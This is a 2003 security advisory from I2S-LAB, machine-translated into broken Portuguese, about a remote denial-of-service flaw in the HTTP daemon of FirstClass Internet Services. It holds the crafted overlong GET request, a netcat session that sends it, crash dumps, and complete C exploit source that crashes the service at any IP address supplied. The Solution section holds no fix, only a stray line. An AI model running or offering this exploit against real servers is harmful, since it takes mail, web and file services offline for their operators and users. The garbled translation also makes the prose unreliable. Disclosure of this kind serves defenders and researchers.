###########################################################################################
~ I2S Segurança De LABORATÓRIO Consultiva ~
###########################################################################################
http://www.I2S-LAB.comDate : 25/09/2003
Afetado sistemas : Construção do FirstClass 133 (SP3) e HTTP Daemon De versões prévio
Vendedor : http://www.centrinity.com
Questão : Attackers pode remotamente shutdown serviços internet (HTTP/FTP/SMTP/POP3/IMAP4/...)Descrição
___________
FirstClass é uma combinação de soluções que permite uma companhia para montar uma intranet de confiança
por integrar serviços internet poderosos e incluindo a maioria dos protocolos de comunicação comuns
(SMTP/ HTTP/ FTP/ ...) Detalhes Técnicos
_________________
FirstClass " Serviços Internet" plug-in tem uma vulnerabilidade do Dos remota no HTTP daemon, que podia ser causado
por uma Pilha Transborda overwriting um ponteiro de dados.
Por enviar uma solicitação em porta 80 gosta de: OBTENHA / HTTP/1.1[Um x 246]
FirstCLass Serviços Internet causarão um erro de violação de acesso por tentar ler em algum lugar no
pilha alguns dados localizados exterior do espaço do adressing alocado pelo process.D:\netcat>nc -vv 10.0.0.5 80
I2S-w2k [10.0.0.5] 80 (http) aberto
GET / HTTP/1.1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAADDDD
sent 262, rcvd 0: NOTSOCK
D:\netcat>
*** Exception in program C:\FCServer\fcintsrv.exe
Location: CList::GetNext+0000003C (004F882C)
Error: Access violation
Cause: Read attempted at <Unknown> (4444444C)
Registers:
EAX=01F2415C EBX=00C802F0 ECX=44444444 <-- pointer is overwritten here
EDX=01F2415C ESI=00000000 EDI=00000000
EIP=004F882C ESP=0205F86C EBP=0205F870 Flags=00000206
CS=0000001B DS=00000023 SS=00000023
ES=00000023 FS=00000038 GS=00000000:004F881D 8B55FC mov edx, dword ptr [ebp-04]
:004F8820 837A0400 cmp dword ptr [edx+04], 00000000
:004F8824 740B je 004F8831
:004F8826 8B45FC mov eax, dword ptr [ebp-04]
:004F8829 8B4804 mov ecx, dword ptr [eax+04]
:004F882C 8B4108 mov eax, dword ptr [ecx+08] <-- crash occurs
:004F882F EB02 jmp 004F8833Exploit
_______/*******************************************
* FirstClass Internet Services Remote DoS *
*******************************************

discovered & coded by I2S-LAB
--------------------------------------------
This exploit uses a ptr overflow to remotely
shutdown the Internet Services of FirstClass. CONTACT
_______
Fred CHAVEROT : fred[at]I2S-LAB.com
Aurélien BOUDOUX : aurelien[at]I2S-LAB.com URL : http://www.I2S-LaB.com
*******************************************/#include <windows.h>
#include <winsock.h>
#pragma comment (lib,"wsock32.lib")
#define PerfectOverwrite 246
void main (int argc, char *argv[])
{
int len;
SOCKET sock1;
SOCKADDR_IN sin;
char *sav;
WSADATA wsadata;
WORD wVersionRequested = MAKEWORD (2,0);
printf ("- FirsClass Internet Services Remote DoS -\n\n"
"Discovered & coded by I2S-LAB\n"
"http://www.I2S-LaB.com\n\n");if (!argv[1])
{
printf ("Usage : %s <IP Address>\n", argv[0]);
ExitProcess (0);
}
if (WSAStartup(wVersionRequested, &wsadata) ) ExitProcess (0);
if (!(sav = (char *) LocalAlloc (LPTR, 20 + PerfectOverwrite)) )
{
printf ("Error ! cannot allocate enough memory.\n");
ExitProcess (0);
};
lstrcat (sav, "GET / HTTP/1.1");
memset (&sav[14], 'A', PerfectOverwrite - 4);
lstrcat (sav,"DDDD\r\n\r\n");
sin.sin_family = AF_INET;
sin.sin_port = htons (80);
if ( (sin.sin_addr.s_addr=inet_addr (argv[1])) == INADDR_NONE)
{
printf ("Incorrect IP Address : %s\n", argv[1]);
ExitProcess(0);
}
sock1 = socket (AF_INET, SOCK_STREAM, 0);
printf ("\nconnecting to %s...", argv[1]);
if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) == SOCKET_ERROR )
printf ("connection failed!\n");
else
{
printf ("ok!\nSending crafted request...");
send (sock1,sav, PerfectOverwrite + 18,0);
puts ("ok!");
}
closesocket (sock1);
}Solution
________

 

Cracks's S.A